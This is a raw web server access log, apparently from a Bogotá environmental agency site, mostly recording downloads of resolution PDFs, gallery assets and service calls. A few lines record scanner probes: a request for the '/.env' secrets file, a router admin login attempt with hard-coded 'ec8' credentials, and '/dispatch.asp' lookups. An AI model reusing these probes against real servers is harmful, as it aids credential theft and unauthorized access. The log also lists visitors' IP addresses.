186.114.114.8 - - [20/Mar/2022:16:11:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2731.pdf HTTP/1.1" 200 354132
216.245.221.92 - - [20/Mar/2022:16:11:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:16:12:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
186.114.114.8 - - [20/Mar/2022:16:13:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2315.pdf HTTP/1.1" 200 400796
186.114.114.8 - - [20/Mar/2022:16:14:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2280.pdf HTTP/1.1" 200 995728
216.245.221.92 - - [20/Mar/2022:16:16:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:16:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2205.pdf HTTP/1.1" 200 399777
186.114.114.8 - - [20/Mar/2022:16:18:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2161.pdf HTTP/1.1" 200 375318
66.249.73.100 - - [20/Mar/2022:16:19:05 -0500] "-" 408 -
212.129.62.32 - - [20/Mar/2022:16:19:20 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
186.114.114.8 - - [20/Mar/2022:16:19:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2160.pdf HTTP/1.1" 200 470358
201.245.192.253 - - [20/Mar/2022:16:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45940
216.245.221.92 - - [20/Mar/2022:16:21:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:16:21:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45371
82.76.165.109 - - [20/Mar/2022:16:22:45 -0500] "GET /.env HTTP/1.1" 404 1018
82.76.165.109 - - [20/Mar/2022:16:22:46 -0500] "POST / HTTP/1.1" 200 319
186.80.136.19 - - [20/Mar/2022:16:24:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.179 - - [20/Mar/2022:16:25:09 -0500] "GET /bla/resoluciones/resoluciones%202014/1890.pdf HTTP/1.1" 200 2014449
216.245.221.92 - - [20/Mar/2022:16:26:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:16:25:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
103.178.236.102 - - [20/Mar/2022:16:29:41 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
186.114.114.8 - - [20/Mar/2022:16:29:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2071.pdf HTTP/1.1" 200 528788
201.245.192.253 - - [20/Mar/2022:16:30:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45940
216.245.221.92 - - [20/Mar/2022:16:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:16:31:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45371
201.245.192.253 - - [20/Mar/2022:16:32:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
207.46.13.43 - - [20/Mar/2022:16:33:53 -0500] "GET /bla/resoluciones/resoluciones%202014/1886.pdf HTTP/1.1" 200 230053
207.46.13.157 - - [20/Mar/2022:16:33:55 -0500] "GET /galeria/galeria/fotos/juan-amarillo1G.jpg HTTP/1.1" 200 407260
186.114.114.8 - - [20/Mar/2022:16:34:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1887.pdf HTTP/1.1" 200 437438
216.245.221.92 - - [20/Mar/2022:16:36:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:36:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1776.pdf HTTP/1.1" 200 381001
157.55.39.218 - - [20/Mar/2022:16:36:56 -0500] "GET /bla/resoluciones/resoluciones%202014/1758.pdf HTTP/1.1" 200 495332
186.114.114.8 - - [20/Mar/2022:16:39:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1682.pdf HTTP/1.1" 200 374840
66.249.73.127 - - [20/Mar/2022:16:39:36 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:16:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45940
216.245.221.92 - - [20/Mar/2022:16:41:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:41:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1449.pdf HTTP/1.1" 200 458919
201.245.192.253 - - [20/Mar/2022:16:41:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45371
186.114.114.8 - - [20/Mar/2022:16:42:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0123.pdf HTTP/1.1" 200 420915
186.114.114.8 - - [20/Mar/2022:16:44:06 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.114.114.8 - - [20/Mar/2022:16:44:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
182.127.215.187 - - [20/Mar/2022:16:44:16 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
186.114.114.8 - - [20/Mar/2022:16:45:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1096.pdf HTTP/1.1" 200 384939
216.245.221.92 - - [20/Mar/2022:16:46:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:16:45:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
157.55.39.218 - - [20/Mar/2022:16:47:18 -0500] "GET /bla/resoluciones/resoluciones%202014/1819.pdf HTTP/1.1" 200 439350
157.55.39.218 - - [20/Mar/2022:16:47:21 -0500] "GET /bla/resoluciones/resoluciones%202014/1395.pdf HTTP/1.1" 200 543724
216.245.221.92 - - [20/Mar/2022:16:51:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:52:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1092.pdf HTTP/1.1" 200 345118
201.245.192.253 - - [20/Mar/2022:16:52:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
173.252.83.20 - - [20/Mar/2022:16:53:38 -0500] "GET /images/cronica-ambiental-28.jpg HTTP/1.1" 200 50693
173.252.83.6 - - [20/Mar/2022:16:53:42 -0500] "GET /images/residuos-bolsas-rojas.jpeg HTTP/1.1" 200 46289
186.114.114.8 - - [20/Mar/2022:16:53:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1078.pdf HTTP/1.1" 200 393323
207.46.13.186 - - [20/Mar/2022:16:54:40 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os-humedales-de-Bogot%C3%A1-768x38.jpg HTTP/1.1" 404 67768
186.114.114.8 - - [20/Mar/2022:16:55:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1070.pdf HTTP/1.1" 200 396583
216.245.221.92 - - [20/Mar/2022:16:56:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:57:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
186.114.114.8 - - [20/Mar/2022:16:57:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0855.pdf HTTP/1.1" 200 356438
34.90.211.22 - - [20/Mar/2022:17:00:25 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [20/Mar/2022:17:01:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:17:02:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3008.pdf HTTP/1.1" 200 263908
201.245.192.253 - - [20/Mar/2022:17:01:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114627
66.249.73.127 - - [20/Mar/2022:17:03:08 -0500] "-" 408 -
157.55.39.218 - - [20/Mar/2022:17:03:49 -0500] "GET /bla/resoluciones/resoluciones%202014/3281.pdf HTTP/1.1" 200 634758
186.114.114.8 - - [20/Mar/2022:17:05:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3808.pdf HTTP/1.1" 200 954142
216.245.221.92 - - [20/Mar/2022:17:06:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:17:08:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3806.pdf HTTP/1.1" 200 1318068
186.114.114.8 - - [20/Mar/2022:17:09:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3805.pdf HTTP/1.1" 200 709520
216.245.221.92 - - [20/Mar/2022:17:11:13 -0500] "HEAD / HTTP/1.1" 200 -
190.26.145.153 - - [20/Mar/2022:17:12:06 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
190.26.145.153 - - [20/Mar/2022:17:12:06 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
190.26.145.153 - - [20/Mar/2022:17:12:06 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 6671
66.249.73.127 - - [20/Mar/2022:17:12:32 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:17:13:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
216.245.221.92 - - [20/Mar/2022:17:16:13 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [20/Mar/2022:17:19:05 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:17:20:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45935
216.245.221.92 - - [20/Mar/2022:17:21:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:17:21:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
201.245.192.253 - - [20/Mar/2022:17:21:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
186.154.122.44 - - [20/Mar/2022:17:23:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
186.154.122.44 - - [20/Mar/2022:17:23:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.102.224.198 - - [20/Mar/2022:17:23:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
186.114.114.8 - - [20/Mar/2022:17:23:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3145.pdf HTTP/1.1" 200 386706
216.245.221.92 - - [20/Mar/2022:17:26:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [20/Mar/2022:17:27:37 -0500] "GET /bla/resoluciones/resoluciones%202021/2399.pdf HTTP/1.1" 200 702453
201.245.192.253 - - [20/Mar/2022:17:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45935
216.245.221.92 - - [20/Mar/2022:17:31:13 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.41 - - [20/Mar/2022:17:31:36 -0500] "GET /portaldeninos/2021/06/20/mas-de-130-arboles-fueron-plantados-en-el-humedal-la-conejera-con-comunidad-educativa/ HTTP/1.1" 200 100387
201.245.192.253 - - [20/Mar/2022:17:31:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
181.61.208.14 - - [20/Mar/2022:17:32:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [20/Mar/2022:17:32:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
199.59.150.183 - - [20/Mar/2022:17:35:51 -0500] "GET /bogota-otorgara-beneficio-ambiental-para-transportadores-de-carga-liviana-a-gas.html HTTP/1.1" 200 896
199.59.150.182 - - [20/Mar/2022:17:35:52 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
157.55.39.218 - - [20/Mar/2022:17:36:02 -0500] "GET /bla/resoluciones/resoluciones%202014/1331.pdf HTTP/1.1" 200 726023
216.245.221.92 - - [20/Mar/2022:17:36:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:17:38:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3129.pdf HTTP/1.1" 200 429903
186.114.114.8 - - [20/Mar/2022:17:40:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3060.pdf HTTP/1.1" 200 345259
201.245.192.253 - - [20/Mar/2022:17:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45935
216.245.221.92 - - [20/Mar/2022:17:41:13 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [20/Mar/2022:17:41:23 -0500] "GET /bla/resoluciones/resoluciones%202014/2380.pdf HTTP/1.1" 200 839006
201.245.192.253 - - [20/Mar/2022:17:41:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
207.46.13.186 - - [20/Mar/2022:17:42:05 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
201.245.192.253 - - [20/Mar/2022:17:42:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
186.114.114.8 - - [20/Mar/2022:17:44:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2625.pdf HTTP/1.1" 200 368248
216.245.221.92 - - [20/Mar/2022:17:46:13 -0500] "HEAD / HTTP/1.1" 200 -
186.118.22.202 - - [20/Mar/2022:17:47:29 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.114.114.8 - - [20/Mar/2022:17:47:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2416.pdf HTTP/1.1" 200 444182
186.118.22.202 - - [20/Mar/2022:17:47:39 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
191.102.224.201 - - [20/Mar/2022:17:47:41 -0500] "GET /forest/ HTTP/1.1" 200 12041
207.46.13.209 - - [20/Mar/2022:17:49:32 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
207.46.13.157 - - [20/Mar/2022:17:49:32 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.157 - - [20/Mar/2022:17:49:34 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
40.77.167.46 - - [20/Mar/2022:17:49:36 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
216.245.221.92 - - [20/Mar/2022:17:51:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:17:51:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
186.114.114.8 - - [20/Mar/2022:17:52:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1954.pdf HTTP/1.1" 200 433211
201.221.172.69 - - [20/Mar/2022:17:53:48 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
186.114.114.8 - - [20/Mar/2022:17:54:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1653.pdf HTTP/1.1" 200 728800
186.114.114.8 - - [20/Mar/2022:17:55:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1652.pdf HTTP/1.1" 200 442145
216.245.221.92 - - [20/Mar/2022:17:56:13 -0500] "HEAD / HTTP/1.1" 200 -
186.80.56.218 - - [20/Mar/2022:17:59:10 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
186.114.114.8 - - [20/Mar/2022:17:59:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1651.pdf HTTP/1.1" 200 792463
186.114.114.8 - - [20/Mar/2022:18:00:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1589.pdf HTTP/1.1" 200 411888
216.245.221.92 - - [20/Mar/2022:18:01:13 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.7 - - [20/Mar/2022:18:02:25 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
207.46.13.43 - - [20/Mar/2022:18:04:40 -0500] "GET /BLA/images/launch.jpg HTTP/1.1" 404 1018
186.29.10.20 - - [20/Mar/2022:18:05:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.29.10.20 - - [20/Mar/2022:18:05:28 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.29.10.20 - - [20/Mar/2022:18:05:28 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.29.10.20 - - [20/Mar/2022:18:05:28 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
186.29.10.20 - - [20/Mar/2022:18:05:29 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
40.77.190.185 - - [20/Mar/2022:18:05:33 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.188.59 - - [20/Mar/2022:18:05:33 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.188.233 - - [20/Mar/2022:18:05:34 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.190.20 - - [20/Mar/2022:18:05:34 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.190.20 - - [20/Mar/2022:18:05:34 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.188.59 - - [20/Mar/2022:18:05:34 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
40.77.190.95 - - [20/Mar/2022:18:05:34 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
201.245.192.253 - - [20/Mar/2022:18:04:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [20/Mar/2022:18:06:13 -0500] "HEAD / HTTP/1.1" 200 -
103.178.236.102 - - [20/Mar/2022:18:07:11 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
216.245.221.92 - - [20/Mar/2022:18:11:13 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.19 - - [20/Mar/2022:18:11:28 -0500] "GET /images/feria-servicios-ambiental-barrios-unidos-17-marzo.jpg HTTP/1.1" 200 58797
201.245.192.253 - - [20/Mar/2022:18:15:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
186.114.114.8 - - [20/Mar/2022:18:16:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0139.pdf HTTP/1.1" 200 402894
216.245.221.92 - - [20/Mar/2022:18:16:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:18:17:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0138.pdf HTTP/1.1" 200 381414
207.46.13.192 - - [20/Mar/2022:18:18:16 -0500] "GET / HTTP/1.1" 200 319
207.46.13.179 - - [20/Mar/2022:18:19:00 -0500] "GET /bla/resoluciones/resoluciones%202014/3409.pdf HTTP/1.1" 200 727700
66.249.73.100 - - [20/Mar/2022:18:19:05 -0500] "-" 408 -
103.138.4.190 - - [20/Mar/2022:18:19:29 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Mar/2022:18:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45942
216.245.221.92 - - [20/Mar/2022:18:21:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:18:21:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 159192
201.245.192.253 - - [20/Mar/2022:18:21:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45802
201.245.192.253 - - [20/Mar/2022:18:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
216.245.221.92 - - [20/Mar/2022:18:26:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:18:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45942
216.245.221.92 - - [20/Mar/2022:18:31:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:18:31:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0320.pdf HTTP/1.1" 200 472599
201.245.192.253 - - [20/Mar/2022:18:31:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45802
201.245.192.253 - - [20/Mar/2022:18:31:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
186.114.114.8 - - [20/Mar/2022:18:34:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2110.pdf HTTP/1.1" 200 520475
186.114.114.8 - - [20/Mar/2022:18:35:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2010.pdf HTTP/1.1" 200 539502
216.245.221.92 - - [20/Mar/2022:18:36:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:18:36:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1945.pdf HTTP/1.1" 200 505557
31.13.103.9 - - [20/Mar/2022:18:36:48 -0500] "GET /images/feria-servicios-ambiental-barrios-unidos-17-marzo.jpg HTTP/1.1" 200 58797
186.114.114.8 - - [20/Mar/2022:18:37:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1943.pdf HTTP/1.1" 200 499564
186.114.114.8 - - [20/Mar/2022:18:38:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1825.pdf HTTP/1.1" 200 505292
186.28.189.55 - - [20/Mar/2022:18:39:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.114.114.8 - - [20/Mar/2022:18:39:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1145.pdf HTTP/1.1" 200 605823
186.28.189.55 - - [20/Mar/2022:18:40:02 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:18:40:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
186.28.189.55 - - [20/Mar/2022:18:40:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
186.28.189.55 - - [20/Mar/2022:18:40:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2010.pdf HTTP/1.1" 200 309757
186.28.189.55 - - [20/Mar/2022:18:40:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2010.pdf HTTP/1.1" 200 309757
201.245.192.253 - - [20/Mar/2022:18:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45942
216.245.221.92 - - [20/Mar/2022:18:41:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:18:41:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45802
186.114.114.8 - - [20/Mar/2022:18:43:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
186.28.189.55 - - [20/Mar/2022:18:43:28 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:18:43:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
186.28.189.55 - - [20/Mar/2022:18:43:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
186.114.114.8 - - [20/Mar/2022:18:44:30 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
186.114.114.8 - - [20/Mar/2022:18:44:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2189.pdf HTTP/1.1" 200 389644
201.245.192.253 - - [20/Mar/2022:18:43:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
207.46.13.186 - - [20/Mar/2022:18:44:41 -0500] "GET /portaldeninos/2021/06/06/ciudadanos-disfrutaron-del-tunel-ambiental-en-el-parque-de-los-novios/ HTTP/1.1" 200 97697
40.77.167.78 - - [20/Mar/2022:18:44:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
40.77.167.78 - - [20/Mar/2022:18:44:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
40.77.167.78 - - [20/Mar/2022:18:44:58 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
